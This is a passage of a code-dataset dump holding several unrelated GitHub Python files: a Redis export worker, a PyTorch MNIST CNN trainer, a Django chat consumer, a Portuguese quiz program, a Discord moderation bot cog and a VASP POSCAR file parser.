                # session.commit()\n\n
            session.bulk_insert_mappings(WssNewsNdlsWrdAnalsVO, ndlsWrdList)\n
            session.bulk_update_mappings(NewsColctVO, comptUpdateList)\n
            session.commit()\n\n\n
            print(\"end loop : \", page)\n
            page = page+1\n
            record = news_rs.limit(limit).all()\n\n
        session.close()\n\n
        logger.info(\"--------------- 종료 ------------------------\")\n
    except UnicodeDecodeError as ed :\n
        session.rollback()\n
        print (ed)\n
        raise ed\n
    except Exception as e:\n
        session.rollback()\n
        print (e)\n
        raise e\n
    finally:\n
        close_session(session)\n\n
if __name__ == '__main__' :\n
    main()","repo_name":"Moon012/reservoir_project","sub_path":"news_except_ndls_wrd.py","file_name":"news_except_ndls_wrd.py","file_ext":"py","file_size_in_byte":8416,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
 +{"seq_id":"5432258936","text":"from redis_helper import redis_helper\n
import redis\n
import export_request\n
from export import export_to_zip\n
import db_helper\n
import upload_to_spaces\n
import mail_user\n
import shutil\n\n
pg_pool = db_helper.get_pg_pool()\n\n
def process_export_task(data):\n
    conn = pg_pool.getconn()\n
    request = export_request.ExportRequest.parse_raw(data)\n
    print(\"Received request: \", request)\n\n
    zip_file_location, dir_export = export_to_zip.generate_zip(conn, request.query_parameters)\n
    pg_pool.putconn(conn)\n\n
    download_url = upload_to_spaces.upload_to_spaces(zip_file_location)\n
    mail_user.mail_download_link(request.email, download_url)\n
    print(\"Finished request\")\n
    # clean up files.\n
    shutil.rmtree(dir_export)\n\n
def wait_on_export_task(r: redis.Redis):\n
    while True:\n
        message = r.blpop(\"export_raw_data_tasks\", 30)\n
        if message:\n
            data = message[1]\n
            process_export_task(data)\n\n
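# Added illustration, not part of the original worker: how the producer side\n
# might enqueue a job. The ExportRequest field names (email, query_parameters)\n
# are inferred from their use in process_export_task above; parse_raw suggests\n
# a pydantic model, so .json() is assumed to exist.\n
def example_enqueue(r: redis.Redis, email, query_parameters):\n
    payload = export_request.ExportRequest(email=email, query_parameters=query_parameters).json()\n
    # rpush + blpop gives first-in-first-out task handling\n
    r.rpush(\"export_raw_data_tasks\", payload)\n\n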
while True:\n
    with redis_helper.get_resource() as r:\n
        wait_on_export_task(r)","repo_name":"Stichting-CROW/dd-raw-data-exporter","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1004,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
 +{"seq_id":"7093073090","text":"# import the required libraries\n
import torch\n
import torch.nn as nn\n
import torchvision.datasets as datasets\n
import torchvision.transforms as transforms\n\n
# hyperparameters\n
num_epochs = 5  # number of training epochs\n
batch_size = 100  # batch size\n
learning_rate = 0.001  # learning rate\n\n
# load the MNIST dataset, converting images to tensors normalized to [0, 1]\n
train_dataset = datasets.MNIST(\n
    root=\"./data\", train=True, transform=transforms.ToTensor(), download=True\n
)\n\n
test_dataset = datasets.MNIST(\n
    root=\"./data\", train=False, transform=transforms.ToTensor()\n
)\n\n
# create data loaders that split the datasets into batches for training and testing\n
train_loader = torch.utils.data.DataLoader(\n
    dataset=train_dataset, batch_size=batch_size, shuffle=True\n
)\n\n
test_loader = torch.utils.data.DataLoader(\n
    dataset=test_dataset, batch_size=batch_size, shuffle=False\n
)\n\n\n
# define the CNN model: two convolutional layers and one fully connected layer\n
class CNN(nn.Module):\n
    def __init__(self):\n
        super(CNN, self).__init__()\n
        # first conv layer: 1 input channel (grayscale), 16 output channels,\n
        # 5x5 kernel, stride 1, padding 2 (keeps the spatial size unchanged)\n
        self.conv1 = nn.Conv2d(1, 16, kernel_size=5, stride=1, padding=2)\n
        # pooling layer: max pooling with a 2x2 kernel and stride 2 (downsampling)\n
        self.pool = nn.MaxPool2d(kernel_size=2, stride=2)\n
        # second conv layer: 16 input channels, 32 output channels,\n
        # 5x5 kernel, stride 1, padding 2 (keeps the spatial size unchanged)\n
        self.conv2 = nn.Conv2d(16, 32, kernel_size=5, stride=1, padding=2)\n
        # fully connected layer: 7*7*32 input features (image size after two\n
        # poolings), 10 output features (number of classes)\n
        self.fc1 = nn.Linear(7 * 7 * 32, 10)\n\n
    def forward(self, x):\n
        # forward pass: defines how the model computes its output\n
        out = self.conv1(x)  # convolution\n
        out = torch.relu(out)  # activation\n
        out = self.pool(out)  # pooling\n
        out = self.conv2(out)  # convolution\n
        out = torch.relu(out)  # activation\n
        out = self.pool(out)  # pooling\n\n
        out = out.reshape(out.size(0), -1)  # flatten the 4-D tensor to 2-D\n\n
        out = self.fc1(out)  # fully connected layer\n\n
        return out\n\n\n
# instantiate the CNN model and move it to the GPU (if one is available)\n
model = CNN()\n
device = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n
model.to(device)\n\n
# define the loss function and the optimizer\n
criterion = nn.CrossEntropyLoss()  # cross-entropy loss for classification\n
optimizer = torch.optim.Adam(model.parameters(), lr=learning_rate)  # Adam optimizer\n\n
# train the model\n\n
total_step = len(train_loader)  # total number of batches\n\n
for epoch in range(num_epochs):  # loop over the training epochs\n
    for i, (images, labels) in enumerate(train_loader):  # loop over the batches\n
        images = images.to(device)  # move the image tensor to the GPU (if any)\n
        labels = labels.to(device)  # move the label tensor to the GPU (if any)\n\n
        outputs = model(images)  # forward pass: get the model outputs\n
        loss = criterion(outputs, labels)  # compute the loss\n\n
        optimizer.zero_grad()  # clear the gradient buffers\n
        loss.backward()  # backward pass: compute the gradients\n
        optimizer.step()  # update the parameters\n\n
        if (i + 1) % 100 == 0:  # print training info every 100 batches\n
            print(\n
                \"Epoch [{}/{}], Step [{}/{}], Loss: {:.4f}\".format(\n
                    epoch + 1, num_epochs, i + 1, total_step, loss.item()\n
                )\n
            )\n\n
# test the model\n\n
model.eval()  # switch to evaluation mode (disables dropout and the like)\n\n
with torch.no_grad():  # disable autograd to save memory and computation\n
    correct = 0  # number of correct predictions\n
    total = 0  # total number of samples\n\n
    for images, labels in test_loader:  # loop over the test batches\n
        images = images.to(device)  # move the image tensor to the GPU (if any)\n
        labels = labels.to(device)  # move the label tensor to the GPU (if any)\n\n
        outputs = model(images)  # forward pass: get the model outputs\n
        _, predicted = torch.max(outputs.data, 1)  # predicted class = argmax per row\n\n
        total += labels.size(0)  # accumulate the sample count\n
        correct += (predicted == labels).sum().item()  # accumulate correct predictions\n\n
    print(\n
        \"Test Accuracy of the model on the 10000 test images: {} %\".format(\n
            100 * correct / total\n
        )\n
    )\n\n
# save the model\n
torch.save(model.state_dict(), \"model.ckpt\")\n
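\n# Added sketch, not part of the original script: reload the checkpoint and run\n
# inference on one test batch. It reuses the CNN class, device and test_loader\n
# defined above.\n
def predict_one_batch():\n
    restored = CNN().to(device)\n
    restored.load_state_dict(torch.load(\"model.ckpt\", map_location=device))\n
    restored.eval()\n
    images, labels = next(iter(test_loader))\n
    with torch.no_grad():\n
        predictions = restored(images.to(device)).argmax(dim=1)\n
    return predictions, labels\n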
","repo_name":"Leokiko/Python-L","sub_path":"day1-15/CNN_pytorch.py","file_name":"CNN_pytorch.py","file_ext":"py","file_size_in_byte":4712,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
 +{"seq_id":"70904189172","text":"import json\n\n
from channels.db import database_sync_to_async\n
from channels.generic.websocket import AsyncWebsocketConsumer\n
from django.contrib.auth import get_user_model\n\n
from messenger.models import Message\n\n\n
class ChatConsumer(AsyncWebsocketConsumer):\n
    async def connect(self):\n
        current_user_id = self.scope['user'].id\n
        other_user_id = self.scope['url_route']['kwargs']['id']\n
        # build a deterministic room name for this pair of users\n
        self.room_name = (\n
            f'{current_user_id}_{other_user_id}'\n
            if int(current_user_id) > int(other_user_id)\n
            else f'{other_user_id}_{current_user_id}'\n
        )\n
        self.room_group_name = f'chat_{self.room_name}'\n
        await self.channel_layer.group_add(self.room_group_name, self.channel_name)\n
        await self.accept()\n\n
    async def disconnect(self, close_code):\n
        # remove this consumer's channel from the room group\n
        await self.channel_layer.group_discard(self.room_group_name, self.channel_name)\n\n
    async def receive(self, text_data=None, bytes_data=None):\n
        data = json.loads(text_data)\n
        message = data['message']\n
        sender_username = data['username']\n
        receiver_username = data['receiver']\n\n
        receiver = await self.get_user(receiver_username)\n
        sender = await self.get_user(sender_username)\n\n
        await self.save_message(sender=sender, receiver=receiver, message=message, thread_name=self.room_group_name)\n\n
        await self.channel_layer.group_send(\n
            self.room_group_name,\n
            {\n
                'type': 'chat_message',\n
                'message': message,\n
                'senderUsername': sender_username,\n
            },\n
        )\n\n
    async def chat_message(self, event):\n
        message = event['message']\n
        username = event['senderUsername']\n\n
        await self.send(\n
            text_data=json.dumps(\n
                {\n
                    'message': message,\n
                    'senderUsername': username,\n
                }\n
            )\n
        )\n\n
    @database_sync_to_async\n
    def get_user(self, username):\n
        return get_user_model().objects.filter(username=username).first()\n\n
    @database_sync_to_async\n
    def save_message(self, sender, receiver, message, thread_name):\n
        Message.objects.create(\n
            sender=sender, receiver=receiver, message=message, thread_name=thread_name)\n
","repo_name":"fedenazar97/Chat","sub_path":"messenger/consumers.py","file_name":"consumers.py","file_ext":"py","file_size_in_byte":2316,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
 +{"seq_id":"8414193879","text":"#write a program in\n
#Python that registers multiple-choice questions for a test\n
#together with their answer keys.\n
#the program must then ask for the answers to each question\n
#and print the result (right and wrong answers). The program must allow\n
#more than one person to enter the answers, until SAIR (exit) is chosen.\n\n
import os\n\n
questoes = {}\n
usuarios = {}\n\n
def limpar_terminal():\n
    os.system('cls' if os.name == 'nt' else 'clear')\n\n
def cadastrar_questao():\n
    limpar_terminal()\n\n
    enunciado = input('Informe o enunciado da questão: ')\n
    letra_a = input(\"Informe a letra A da questão: \")\n
    letra_b = input(\"Informe a Letra B da questão: \")\n
    letra_c = input(\"Informe a Letra C da questão: \")\n
    letra_d = input(\"Informe a Letra D da questão: \")\n\n
    gabarito = input(\"Infome o gabarito (a, b, c ou d): \")\n
    while gabarito not in [\"a\", \"b\", \"c\", \"d\"]:\n
        print(\"Informe um gabarito válido.\")\n
        gabarito = input(\"Infome o gabarito (a, b, c ou d): \")\n\n
    questoes[enunciado] = {\n
        \"enunciado\": enunciado,\n
        \"alternativas\":{\n
            \"letra_a\": letra_a,\n
            \"letra_b\": letra_b,\n
            \"letra_c\": letra_c,\n
            \"letra_d\": letra_d},\n
        \"gabarito\":gabarito}\n\n
    print(questoes)\n\n
def responder_questoes():\n
    limpar_terminal()\n\n
    for nome, usuario in usuarios.items():\n
        print(f\"\\nAgora é a vez de: {usuario['nome']}\")\n
        for pergunta, resposta in questoes.items():\n
            print(\"\\n\")\n
            print(f\"Pergunta: {pergunta}\")\n
            print(\"a - \"+ resposta[\"alternativas\"][\"letra_a\"])\n
            print(\"b - \"+ resposta[\"alternativas\"][\"letra_b\"])\n
            print(\"c - \"+ resposta[\"alternativas\"][\"letra_c\"])\n
            print(\"d - \"+ resposta[\"alternativas\"][\"letra_d\"])\n\n
            resposta_usuario = input(\"\\nInforme a resposta (a, b, c ou d): \")\n
            while resposta_usuario not in [\"a\", \"b\", \"c\", \"d\"]:\n
                print(\"Informe uma resposta válida.\")\n
                resposta_usuario = input(\"\\nInforme a resposta (a, b, c ou d): \")\n\n
            if resposta_usuario == resposta[\"gabarito\"]:\n
                print(\"Resposta correta\")\n
                usuario['acertos'] += 1\n
            else:\n
                print(\"Resposta errada\")\n
                print(f\"Resposta correta : {resposta['gabarito']}\")\n
                usuario['erros'] += 1\n\n
        print(f\"{usuario['nome']} acertou {usuario['acertos']} questões e errou {usuario['erros']} questões.\")\n
        usuario['acertos'] = 0\n
        usuario['erros'] = 0\n\n
def ListarQuestoes():\n
    limpar_terminal()\n
    for pergunta, resposta in questoes.items():\n
        print(pergunta)\n
    print(\"\\n\")\n
    print(\"Deseja sair ?\")\n
    print(\"1 - Sim\")\n
    print(\"2 - Não\")\n
    opcao = input(\"Informe a opção: \")\n
    if opcao == \"1\":\n
        limpar_terminal()\n
    else:\n
        limpar_terminal()\n
        ListarQuestoes() \n\n
def cadastrar_usuario():\n
    limpar_terminal()\n\n
    nome = input(\"Informe o nome: \")\n
    usuarios[nome] = {\n
        \"nome\": nome,\n
        \"acertos\": 0,\n
        \"erros\": 0\n
    }   \n\n
def IniciaPrograma():\n
    while True:\n
        limpar_terminal()\n\n
        print(\"\\n1. Cadastrar questão\")\n
        print(\"2. Responder questões\")\n
        print(\"3. Listar questões\")\n
        print(\"4. Cadastrar usuario\")\n
        opcao_selecionada= input(\"\\nInforma a opcao: \")\n\n
        if opcao_selecionada ==\"1\":\n
            cadastrar_questao()\n
        elif opcao_selecionada == \"2\":\n
            responder_questoes()\n
        elif opcao_selecionada == \"3\":\n
            ListarQuestoes()  \n
        elif opcao_selecionada == \"4\":\n
            cadastrar_usuario()  \n
        else:\n
            break\n\n
IniciaPrograma()\n
","repo_name":"wellbritto98/Atividades-Primeira-Unidade","sub_path":"questões.py","file_name":"questões.py","file_ext":"py","file_size_in_byte":3706,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
 +{"seq_id":"12386893479","text":"import time, threading\n\n
'''\n
    Simulate JavaScript's setInterval.\n
    Taken from: https://stackoverflow.com/questions/2697039/python-equivalent-of-setinterval\n
'''\n\n\n
class SetInterval:\n
    def __init__(self, interval: int, action, generate_params):\n
        self.interval = interval\n
        self.action = action\n
        self.generate_params = generate_params\n
        self.stopEvent = threading.Event()\n
        thread = threading.Thread(target=self.__setInterval)\n
        thread.start()\n\n
    def __setInterval(self):\n
        nextTime = time.time() + self.interval\n
        while not self.stopEvent.wait(nextTime - time.time()):\n
            nextTime += self.interval\n
            self.action(self.generate_params())\n\n
    def cancel(self):\n
        self.stopEvent.set()
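\n\n# Added usage sketch, not part of the original file: call action(generate_params())\n
# every 2 seconds, then stop the timer after roughly 7 seconds.\n
if __name__ == '__main__':\n
    ticker = SetInterval(2, print, time.time)\n
    time.sleep(7)\n
    ticker.cancel()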
","repo_name":"Jorgeewa/data-pipeline","sub_path":"robot/interval.py","file_name":"interval.py","file_ext":"py","file_size_in_byte":755,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
 +{"seq_id":"12952078796","text":"import disnake\r\n
from disnake.ext import commands\r\n
from random import randint, random\r\n
from disnake import Option\r\n
import sqlite3\r\n
from datetime import datetime\r\n\r\n\r\n
conn = sqlite3.connect('bans.db')\r\n
c = conn.cursor()\r\n\r\n
# table used by the /ban and /unban commands below (schema matches their INSERT)\r\n
c.execute('''CREATE TABLE IF NOT EXISTS bans\r\n             (user_id INTEGER PRIMARY KEY, username TEXT, reason TEXT)''')\r\n\r\n
conn = sqlite3.connect('warn.db')\r\n
c = conn.cursor()\r\n\r\n
c.execute('''CREATE TABLE IF NOT EXISTS warnings\r\n             (user_id INTEGER PRIMARY KEY, num_warnings INTEGER)''')\r\n\r\n
conn = sqlite3.connect('black-list-words.db')\r\n
c = conn.cursor()\r\n\r\n
c.execute(\"CREATE TABLE IF NOT EXISTS bad_words (word TEXT)\")\r\n\r\n\r\n\r\n
class admins(commands.Cog):\r\n
    def __init__(self, bot: commands.Bot):\r\n
        self.bot = bot\r\n\r\n\r\n
    @commands.slash_command(name=\"kick\", description=\"Выгнать пользователя с сервера.\")\r\n
    @commands.has_permissions(kick_members=True)\r\n
    async def kick_user(self, ctx: disnake.ApplicationCommandInteraction, user: disnake.Member, reason: str = None):\r\n\r\n
        if user.top_role >= ctx.author.top_role:\r\n
            await ctx.send(\"Вы не можете кикнуть пользователя с более высокой или равной ролью.\")\r\n
            return\r\n\r\n
        await user.kick(reason=reason)\r\n
        try:\r\n
            await user.send(f\"Вы были кикнуты с сервера {ctx.guild.name}. 
Причина: {reason}\")\r\n except disnake.errors.HTTPException:\r\n pass\r\n embed = disnake.Embed(color=0xCD853F)\r\n embed.add_field(name=\"Kick\", value=f\"{ctx.author.mention} кикнула {user.mention} из {ctx.guild} сервера 😔\")\r\n embed.add_field(name=\"Причина\", value=reason if reason else \"Не указана\")\r\n\r\n await ctx.send(embed=embed, ephemeral=True)\r\n\r\n\r\n\r\n @commands.slash_command(name='clear', description='Очистить чат')\r\n async def clear(self, ctx, amount: int):\r\n if not ctx.author.guild_permissions.manage_messages:\r\n raise commands.CheckFailure\r\n\r\n if amount > 1000:\r\n await ctx.send('Кискис нельзя удалить больше 1000 сообщений за раз.')\r\n return\r\n\r\n deleted = await ctx.channel.purge(limit=amount)\r\n embed = disnake.Embed(color=0xCD853F)\r\n embed.add_field(name=\"Очистила чат\", value=f\"Удалила {len(deleted)} сообщений 😊\", inline=False)\r\n await ctx.send(embed=embed, ephemeral=True)\r\n\r\n\r\n \r\n @commands.slash_command(name=\"ban\", description=\"Забанить пользователя.\")\r\n @commands.has_permissions(ban_members=True)\r\n async def ban_user(self, ctx, user: disnake.Member, reason: str = None):\r\n conn = sqlite3.connect('bans.db')\r\n c = conn.cursor()\r\n c.execute(\"SELECT user_id FROM bans WHERE user_id=?\", (user.id,))\r\n banned_user = c.fetchone()\r\n\r\n if banned_user:\r\n embed = disnake.Embed(title=\"Бан\", description=f\"{user.mention} Этот пользов��тель уже забанен.\", color=0xCD853F)\r\n else:\r\n await user.ban(reason=reason)\r\n c.execute(\"INSERT INTO bans (user_id, username, reason) VALUES (?, ?, ?)\", (user.id, user.name, reason))\r\n conn.commit()\r\n embed = disnake.Embed(title=\"Бан\", description=f\"{user.mention} Я забанила эту хамку.😤\", color=0xCD853F)\r\n try:\r\n await user.send(embed=embed)\r\n except disnake.errors.HTTPException:\r\n pass\r\n\r\n await ctx.send(embed=embed, ephemeral=True)\r\n\r\n\r\n @commands.slash_command(name=\"unban\", description=\"Разбанить пользователя.\")\r\n @commands.has_permissions(ban_members=True)\r\n async def unban_user(self, ctx, user: disnake.User, reason: str = None):\r\n banned_users = await ctx.guild.bans()\r\n user_name, user_discriminator = user.name, user.discriminator\r\n\r\n for banned_entry in banned_users:\r\n banned_user = banned_entry.user\r\n if (banned_user.name, banned_user.discriminator) == (user_name, user_discriminator):\r\n await ctx.guild.unban(banned_user, reason=reason)\r\n conn = sqlite3.connect('bans.db')\r\n c = conn.cursor()\r\n c.execute(\"DELETE FROM bans WHERE user_id=?\", (banned_user.id,))\r\n conn.commit()\r\n embed = disnake.Embed(title=\"Разбан\", description=f\"{banned_user.mention} был успешно разбанен.\", color=0xCD853F)\r\n try:\r\n await banned_user.send(embed=embed)\r\n except disnake.errors.HTTPException:\r\n pass\r\n \r\n await ctx.send(embed=embed, ephemeral=True)\r\n return\r\n\r\n\r\n\r\n @commands.slash_command(name=\"message_bot\", description=\"Отправить сообщение от имени Полины.\")\r\n @commands.has_permissions(administrator=True)\r\n async def echo(self, ctx: disnake.ApplicationCommandInteraction, channel: disnake.TextChannel, role: disnake.Role, *, message: str):\r\n message = message.replace(\"-\", \"\\n\")\r\n embed = disnake.Embed(color=0xCD853F)\r\n embed.add_field(name=\"\", value=message, inline=False)\r\n\r\n role_mention = role.mention\r\n\r\n message_with_role = f\"{role_mention}\"\r\n\r\n await channel.send(embed=embed, content=message_with_role)\r\n\r\n\r\n\r\n\r\n @commands.slash_command(name='join', 
description='Зайти в голосовой канал')\r\n
    @commands.has_permissions(administrator=True)\r\n
    async def join(self, ctx: disnake.ApplicationCommandInteraction):\r\n
        if not ctx.author.voice:\r\n
            embed = disnake.Embed(\r\n
                color=0xe21212,\r\n
                title=\"Ошибка\",\r\n
                description=\"Ты должен находиться в голосовом канале для использования этой команды\"\r\n
            )\r\n
            await ctx.send(embed=embed, ephemeral=True)\r\n
            return\r\n\r\n
        channel = ctx.author.voice.channel\r\n
        await channel.connect()\r\n
        embed = disnake.Embed(\r\n
            color=0xCD853F,\r\n
            title=\"Готово\",\r\n
            description=f\"Успешно подключилась к голосовому каналу {channel.name}\"\r\n
        )\r\n
        await ctx.send(embed=embed, ephemeral=True)\r\n\r\n
        voice_channel = ctx.author.voice.channel\r\n
        embed = disnake.Embed(color=0xCD853F)\r\n
        embed.add_field(name=\"voice\", value=voice_channel.name, inline=False)\r\n
        await ctx.send(embed=embed, ephemeral=True)\r\n\r\n\r\n\r\n\r\n\r\n
    @commands.slash_command(name='leave', description='Выйти из голосового канала')\r\n
    @commands.has_permissions(administrator=True)\r\n
    async def leave(self, ctx: disnake.ApplicationCommandInteraction):\r\n
        if not ctx.guild.voice_client:\r\n
            embed = disnake.Embed(\r\n
                color=0xCD853F,\r\n
                title=\"Ошибка\",\r\n
                description=\"Я не нахожусь в голосовом канале\"\r\n
            )\r\n
            await ctx.response.send_message(embed=embed, ephemeral=True)\r\n
            return\r\n\r\n
        await ctx.guild.voice_client.disconnect()\r\n
        embed = disnake.Embed(\r\n
            color=0xCD853F,\r\n
            title=\"Готово\",\r\n
            description=\"Успешно отключилась от голосового канала\"\r\n
        )\r\n
        await ctx.response.send_message(embed=embed, ephemeral=True)\r\n\r\n\r\n\r\n
    @commands.slash_command(name='stay', description='Оставаться Полине в голосовом канале')\r\n
    @commands.has_permissions(administrator=True)\r\n
    async def stay(self, ctx):\r\n
        if not ctx.author.voice:\r\n
            embed = disnake.Embed(\r\n
                color=0xCD853F,\r\n
                title=\"Ошибка\",\r\n
                description=\"Вы должны находиться в голосовом канале, чтобы использовать эту команду.\"\r\n
            )\r\n
            await ctx.send(embed=embed, ephemeral=True)\r\n
            return\r\n\r\n
        vc = ctx.author.voice.channel\r\n
        voice_client = ctx.guild.voice_client\r\n
        if voice_client and voice_client.is_connected():\r\n
            await voice_client.move_to(vc)\r\n
            embed = disnake.Embed(\r\n
                color=0xCD853F,\r\n
                title=\"Готово\",\r\n
                description=f'Я останусь в голосовом канале \"{vc.name}\" до тех пор, пока меня не попросят выйти. 
Для этого напиши /leave.'\r\n
            )\r\n
        else:\r\n
            voice_client = await vc.connect()\r\n
            embed = disnake.Embed(\r\n
                color=0xCD853F,\r\n
                title=\"Готово\",\r\n
                description=\"Удачно зашла в голосовой канал.\"\r\n
            )\r\n\r\n
        await ctx.send(embed=embed, ephemeral=True)\r\n\r\n\r\n
    @commands.slash_command(name='create_role', description='Создание новой роли')\r\n
    @commands.has_permissions(administrator=True)\r\n
    async def create_role(self, ctx, name: str):\r\n
        guild = ctx.guild\r\n
        role = await guild.create_role(name=name)\r\n
        embed = disnake.Embed(\r\n
            title='Роль создана',\r\n
            description=f'Новая роль {role.mention} была создана!',\r\n
            color=0xCD853F\r\n
        )\r\n
        await ctx.send(embed=embed, ephemeral=True)\r\n\r\n\r\n
    @commands.slash_command(name='assign_role', description='Выдача роли пользователю')\r\n
    @commands.has_permissions(administrator=True)\r\n
    async def assign_role(self, ctx, role: disnake.Role, member: disnake.Member):\r\n
        await member.add_roles(role)\r\n
        embed = disnake.Embed(\r\n
            title='Роль добавлена',\r\n
            description=f'Пользователю {member.mention} была выдана роль {role.mention}!',\r\n
            color=0xCD853F\r\n
        )\r\n
        await ctx.send(embed=embed, ephemeral=True)\r\n\r\n\r\n
    @commands.slash_command(name='remove_role', description='Удаление роли у пользователя')\r\n
    @commands.has_permissions(administrator=True)\r\n
    async def remove_role(self, ctx, role: disnake.Role, member: disnake.Member):\r\n
        await member.remove_roles(role)\r\n
        embed = disnake.Embed(\r\n
            title='Роль удалена',\r\n
            description=f'У пользователя {member.mention} была удалена роль {role.mention}!',\r\n
            color=0xCD853F\r\n
        )\r\n
        await ctx.send(embed=embed, ephemeral=True)\r\n\r\n\r\n\r\n
    @commands.slash_command(name=\"setnick\", description=\"Сменить никнейм участнику.\")\r\n
    @commands.has_permissions(administrator=True)\r\n
    async def set_nickname(self, ctx, member: disnake.Member, new_nickname: str):\r\n
        await member.edit(nick=new_nickname)\r\n
        embed = disnake.Embed(\r\n
            title=\"Изменение никнейма :pen_ballpoint:\",\r\n
            description=f\"Никнейм участника {member.mention} был изменен на {new_nickname}.\",\r\n
            color=0xCD853F\r\n
        )\r\n
        await ctx.send(embed=embed, ephemeral=True)\r\n\r\n\r\n
    @commands.slash_command(name=\"setcolorrole\", description=\"Изменить цвет роли\")\r\n
    @commands.has_permissions(administrator=True)\r\n
    async def set_color_role(self, ctx, role: disnake.Role, color: str = None):\r\n
        if color is not None:\r\n
            try:\r\n
                color = disnake.Color(int(color.lstrip('#'), 16))\r\n
            except ValueError:\r\n
                embed = disnake.Embed(title='Ошибка', description='Некорректный формат цвета. 
Цвет должен быть указан в HEX-формате (например, #ff0000)', color=0xff0000)\r\n
                await ctx.send(embed=embed, ephemeral=True)\r\n
                return\r\n
        else:\r\n
            color = disnake.Color.random()\r\n\r\n
        await role.edit(color=color)\r\n\r\n
        embed = disnake.Embed(title='Цвет изменен', color=0xCD853F)\r\n
        embed.add_field(name='Роль', value=role.mention)\r\n
        embed.add_field(name='Цвет', value=f'#{color.value:06x}')\r\n\r\n
        await ctx.send(embed=embed, ephemeral=True)\r\n\r\n\r\n
    @commands.guild_only()\r\n
    @commands.slash_command(\r\n
        name=\"voting\", \r\n
        description=\"Провести голосование\",\r\n
        options=[\r\n
            disnake.Option(\"text\", \"Введите текст!\", required=True)\r\n
        ]\r\n
    )\r\n
    @commands.has_permissions(administrator=True)\r\n
    async def poll(self, ctx, *, text):\r\n
        await ctx.channel.purge(limit=1)\r\n
        poll = disnake.Embed(description=text, colour=randint(0, 0xCD853F))\r\n
        poll.timestamp = datetime.utcnow()\r\n
        msg = await ctx.channel.send(embed=poll)\r\n
        await msg.add_reaction(\"✔\")\r\n
        await msg.add_reaction(\"❌\")\r\n\r\n\r\n\r\n
    @commands.slash_command(name=\"send-dm\", description=\"Отправить в лс сообщение от имени бота\")\r\n
    @commands.has_permissions(administrator=True)\r\n
    @commands.guild_only()\r\n
    async def send(self, ctx, member: disnake.Member, *, text):\r\n
        embed = disnake.Embed(title=\"Обращение к вам!\", color=disnake.Color.dark_red())\r\n
        embed.add_field(name=\"Сообщение:\", value=text)\r\n
        embed.set_thumbnail(url=ctx.bot.user.display_avatar)\r\n
        await member.send(embed=embed)\r\n\r\n
        success_embed = disnake.Embed(title=\"Сообщение отправлено!\",\r\n
                                      description=f\"Успешно отправил участнику {member.mention}\",\r\n
                                      color=0xCD853F)\r\n
        await ctx.send(embed=success_embed, ephemeral=True)\r\n\r\n    \r\n
def setup(bot: commands.Bot):\r\n
    bot.add_cog(admins(bot))","repo_name":"kamil12-dev/Polina_bot","sub_path":"cogs/admins.py","file_name":"admins.py","file_ext":"py","file_size_in_byte":13999,"program_lang":"python","lang":"ru","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"}
 +{"seq_id":"72293740854","text":"from numpy import array,dot\r\n
from numpy.linalg import inv\r\n
from getopt import getopt, GetoptError\r\n
import sys\r\n \r\n
def remove_seldyn(ifile,ofile):\r\n
    try:\r\n
        lv, coord, atomtypes, atomnums, seldyn = parse_poscar(ifile)\r\n
    except ValueError:\r\n
        lv, coord, atomtypes, atomnums = parse_poscar(ifile)\r\n
    write_poscar(ofile, lv, coord, atomtypes, atomnums)\r\n\r\n
def parse_poscar(ifile):\r\n
    with open(ifile, 'r') as file:\r\n
        lines=file.readlines()\r\n
    sf=float(lines[1])\r\n
    latticevectors=[float(lines[i].split()[j])*sf for i in range(2,5) for j in range(3)]\r\n
    latticevectors=array(latticevectors).reshape(3,3)\r\n
    atomtypes=lines[5].split()\r\n
    atomnums=[int(i) for i in lines[6].split()]\r\n
    if lines[7].split()[0] == 'Direct':\r\n
        start=8\r\n
    else:\r\n
        start=9\r\n
    seldyn=[''.join(lines[i].split()[-3:]) for i in range(start,sum(atomnums)+start)]\r\n
    coord=array([[float(lines[i].split()[j]) for j in range(3)] for i in range(start,sum(atomnums)+start)])\r\n
    for i in range(sum(atomnums)):\r\n
        coord[i]=dot(latticevectors,coord[i])\r\n\r\n
    #latticevectors formatted as a 3x3 array\r\n
    #coord holds the atomic coordinates with shape (sum(atomnums), 3)\r\n
    try:\r\n
        return latticevectors, coord, atomtypes, atomnums, seldyn\r\n
    except NameError:\r\n
        return latticevectors, coord, atomtypes, atomnums\r\n\r\n
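# Added usage sketch, not part of the original module; the file paths are\r\n
# hypothetical. Reads a POSCAR and writes a copy (any selective dynamics flags\r\n
# are dropped because the seldyn argument is omitted).\r\n
def _example_roundtrip():\r\n
    lv, coord, atomtypes, atomnums = parse_poscar('./POSCAR')[:4]\r\n
    write_poscar('./POSCAR_copy', lv, coord, atomtypes, atomnums)\r\n\r\n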
def write_poscar(ofile, lv, coord, atomtypes, atomnums, **args):\r\n
    with open(ofile,'w') as file:\r\n
        if 'title' in args:\r\n
            file.write(str(args['title']))\r\n
        file.write('\\n1.0\\n')\r\n
        for i in range(3):\r\n
            for j in range(3):\r\n
                file.write(str('{:<018f}'.format(lv[i][j])))\r\n
                if j<2:\r\n
                    file.write(' ')\r\n
            file.write('\\n')\r\n
        for i in atomtypes:\r\n
            file.write(' '+str(i))\r\n
        file.write('\\n')\r\n
        for i in atomnums:\r\n
            file.write(' '+str(i))\r\n
        file.write('\\n')\r\n
        if 'seldyn' in args:\r\n
            file.write('Selective Dynamics\\n')\r\n
        file.write('Direct\\n')\r\n
        lv=inv(lv)\r\n
        for i in range(len(coord)):\r\n
            coord[i]=dot(lv,coord[i])\r\n
            for j in range(3):\r\n
                if coord[i][j]>1.0:\r\n
                    coord[i][j]-=1.0\r\n
        for i in range(len(coord)):\r\n
            for j in range(3):\r\n
                file.write(str('{:<018f}'.format(coord[i][j])))\r\n
                if j<2:\r\n
                    file.write(' ')\r\n
            if 'seldyn' in args:\r\n
                for j in range(3):\r\n
                    file.write(' ')\r\n
                    file.write(args['seldyn'][i][j])\r\n
            file.write('\\n')\r\n
